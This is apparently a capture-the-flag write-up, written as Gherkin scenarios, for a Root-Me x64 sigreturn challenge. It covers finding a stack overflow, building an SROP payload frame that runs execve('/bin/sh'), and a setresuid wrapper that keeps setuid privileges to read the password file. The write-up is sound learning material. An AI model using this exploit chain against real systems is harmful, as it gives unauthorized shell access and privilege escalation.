## Version 2.0
## language: en

Feature: elf-x64-sigreturn
  Site:
    rootme
  Category:
    app-system
  User:
    M'baku
  Goal:
    Get shell and read the password

  Background:
  Hacker's software:
    | <Software name> | <Version> |
    | Ubuntu          | 18.04.4   |
    | gdb-pwndbg      | 1.1.0     |
    | VMware          | 15.5.6    |
    | IDA             | 7.2       |
    | strace          | 1.0       |
    | ropper          | 1.13.5    |
    | Windows         | 10        |

  Machine information:
    Given I am accessing the challenge through its URL
    When I visit the link
    Then I see a description with the following sentence "SROP"
    And it is possible to download the challenge

  Scenario: Sucess:Analyze the binary and finding bugs
    Given the source code is not provided
    Then I downloaded the binary
    And I get information from the binary
    """
    $ file ch37
    ch37: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically
    linked, not stripped
    """
    Then I analyze it with IDA disassembler
    And I notice that the binary only have two functions [evidences](funcs.png)
    """
    _start
    sayhello
    """
    Then this may mean that the binary was written in assembler
    When I analyze the sayhello function [evidences](sayhello.png)
    Then I initially see 3 interesting things
    """
    1. The stack reserves 0x20 (32d) bytes
    2. read syscall stores the bytes in rsp
    3. read syscall can read maximum 0x320 (800d) bytes
    """
    And this way it is possible to overflow the stack

  Scenario: Fail:Exploiting the bug
    Given I recognize the bug
    And by the name of the challenge and the description
    Then the idea is to do a SROP (Sigreturn Oriented Programming)
    And it basically consists of "rt_sigreturn" syscall
    And the "ucontext_t" struct
    """
    // defined in /usr/include/sys/ucontext.h
    /* Userlevel context.  */

    typedef struct ucontext_t
    {
        unsigned long int uc_flags;
        struct ucontext_t *uc_link;
        stack_t uc_stack;           // the stack used by this context
        mcontext_t uc_mcontext;     // the saved context
        sigset_t uc_sigmask;
        struct _libc_fpstate __fpregs_mem;
    } ucontext_t;

    // defined in /usr/include/bits/types/stack_t.h
    /* Structure describing a signal stack.  */

    typedef struct
    {
        void *ss_sp;
        size_t ss_size;
        int ss_flags;
    } stack_t;

    // difined in /usr/include/bits/sigcontext.h
    struct sigcontext
    {
        __uint64_t r8;
        __uint64_t r9;
        __uint64_t r10;
        __uint64_t r11;
        __uint64_t r12;
        __uint64_t r13;
        __uint64_t r14;
        __uint64_t r15;
        __uint64_t rdi;
        __uint64_t rsi;
        __uint64_t rbp;
        __uint64_t rbx;
        __uint64_t rdx;
        __uint64_t rax;
        __uint64_t rcx;
        __uint64_t rsp;
        __uint64_t rip;
        __uint64_t eflags;
        unsigned short cs;
        unsigned short gs;
        unsigned short fs;
        unsigned short ss;
        __uint64_t err;
        __uint64_t trapno;
        __uint64_t oldmask;
        __uint64_t cr2;
        __extension__ union
        {
            struct _fpstate * fpstate;
            __uint64_t __fpstate_word;
        };
        __uint64_t __reserved1 [8];
    };
    """
    When a user process starts a signal, control is changed to the kernel
    Then the kernel saves the process context on the user stack
    Then pushes the rt_sigreturn address onto the stack
    And jumps to userland to execute the signal handler, that is, rt_sigreturn
    Then after rt_sigreturn is executed, jump to the kernel
    Then The kernel restores the process context saved
    And the control is transferred to userland
    Then knowing this, my idea is to create a fake ucontext_t struct
    And trigger rt_sigreturn, the syscall number to sigreturn is 0xf (15d)
    Then looking for a gadget with ropper to put 0xf in rax [evidences](ro.png)
    """
    $ ropper --file ch37
    0x000000000040011b: adc al, 0; add byte ptr [rax], al; syscall;
    ...
    ...
    0x0000000000400101: ret;
    0x00000000004000ff: syscall;
    0x000000000040017c: syscall; add rsp, 0x20; ret;
    0x00000000004000ff: syscall; ret;
    """
    Then I did not find any useful gadgets

  Scenario: Sucess:Put 0xf (15d) in rax
    Given I did not find useful gadgets to put 0xf in rax
    And I can execute syscalls with number greater than 42
    Then my idea is to find a return value that helps me control rax
    And I tried several syscalls
    """
    sys_connect == -88
    sys_accept == -88
    sys_sendto == -88
    sys_recvfrom == -88
    sys_sendmsg == -88
    sys_recvmsg == -88
    sys_shutdown == -88
    sys_bind == -88
    sys_listen
    sys_getsockname
    sys_getpeername
    sys_socketpair
    sys_setsockopt
    sys_getsockopt
    sys_clone
    sys_fork
    sys_vfork == 0
    sys_execve == -14
    """
    Then I saw that different syscalls returns -14 (EFAULT)
    And a primitive in the text that allows me to increase rax
    """
    0x0000000000400163 mov     edx, 11h
    0x0000000000400168 add     rdx, rax
    0x000000000040016B add     rdx, 2          ; count
    0x000000000040016F mov     eax, 1
    0x0000000000400174 mov     edi, 1          ; fd
    0x0000000000400179 mov     rsi, rsp        ; buf
    0x000000000040017C syscall                 ; LINUX - sys_write
    """
    Then the idea is to jump to 0x0000000000400163, add rax (-14) and rdx (17)
    And increase 2
    """
    0x0000000000400163 mov     edx, 11h        ; edx = 17
    0x0000000000400168 add     rdx, rax        ; edx = 17 + (-14) = 3
    0x000000000040016B add     rdx, 2          ; edx = 3 + 2      = 5
    """
    And thanks to the return of sys_write() [evidences](rax.png)
    Then it's possible jump to 0x000000000040016B 4 times to complete 0xf (15d)
    """
    $ strace -p 3464 (pid)
    write(1, "Nice to meet you AAAAAAAAAAAAAAA"..., 92) = 92
    chown(0x1, 2004217392, 92)              = -1 EFAULT (Bad address)
    write(1, "WRNBl", 5)                    = 5
    write(1, "AAAAAAA", 7)                  = 7
    write(1, "AAAAAAAAA", 9)                = 9
    write(1, "AAAAAAAAAAA", 11)             = 11
    write(1, "AAAAAAAAAAAAA", 13)           = 13
    write(1, "AAAAAAAAAAAAAAA", 15)         = 15
    rt_sigreturn({mask=[]})                 = 0
    --- SIGSEGV {si_signo=SIGSEGV, si_code=SI_KERNEL, si_addr=NULL} ---
    """

  Scenario: Sucess:Exploiting the bug
    Given I can trigger rt_sigreturn syscall
    Then the idea is to create a fake ucontext_t struct
    And this is basically putting the correct values on the stack
    """
    payload += p64(0x0) # uc_flags
    payload += p64(0x0) # &uc
    payload += p64(0x0) # uc_stack.ss_sp
    payload += p64(0x0) # uc_stack.ss_flags
    payload += p64(0x0) # uc_stack.ss_size
    payload += p64(0x0) # r8
    payload += p64(0x0) # r9
    payload += p64(0x0) # r10
    payload += p64(0x0) # r11
    payload += p64(0x0) # r12
    payload += p64(0x0) # r13
    payload += p64(0x0) # r14
    payload += p64(0x0) # r15
    payload += p64(leak + 16) # rdi
    payload += p64(0x0) # rsi
    payload += p64(0x0) # rbp
    payload += p64(0x0) # rbx
    payload += p64(0x0) # rdx
    payload += p64(0x3b) # rax
    payload += p64(0x0) # rcx
    payload += p64(0x0) # rsp
    payload += p64(0x00000000004000ff) # rip
    payload += p64(0x0) # eflags
    payload += p64(0x33) # csgsfs
    payload += p64(0x0) # err
    payload += p64(0x0) # trapno
    payload += p64(0x0) # oldmask
    payload += p64(0x0) # cr2
    payload += p64(0x0) # &fpstate
    payload += p64(0x0) # __reserved
    payload += p64(0x0) # sigmask
    """
    Then what I did was set the kernel return to
    """
    execve(const char *pathname, char *const argv[], char *const envp[]);
    """
    And in pathname I put an environment variable with the string "/bin/sh"
    Then I got shell [evidences](shell.png)

  Scenario: Sucess:Privilege scalation
    Given I got shell with the user "app-systeme-ch37"
    And the binary is setuid with the owner "app-systeme-ch37-cracked"
    Then the .passwd file its owner is "app-systeme-ch37-cracked" as well
    """
    $ ls -la
    ...
    app-systeme-ch37-cracked app-systeme-ch37         1272 avril  7  2019 ch37
    app-systeme-ch37-cracked app-systeme-ch37-cracked   24 août 2  2018 .passwd
    """
    Then my idea was to make a wrapper to set real owner with setresuid()
    """
    #include <unistd.h>
    #include <sys/types.h>

    int main() {
        setresuid(geteuid(), geteuid(), geteuid());
        char *arg = "/bin/sh";
        execl(arg, NULL, NULL);
        return 0;
    }
    """
    And this is because current shells like /bin/sh drops privileges
    Then I compiled the wrapper in the /tmp folder
    And I put an environment variable with the string "/tmp/wrapper"
    Then execve looks like:
    """
    execve("/tmp/wrapper", 0, 0);
    """
    And voila! [evidences](nice.png)
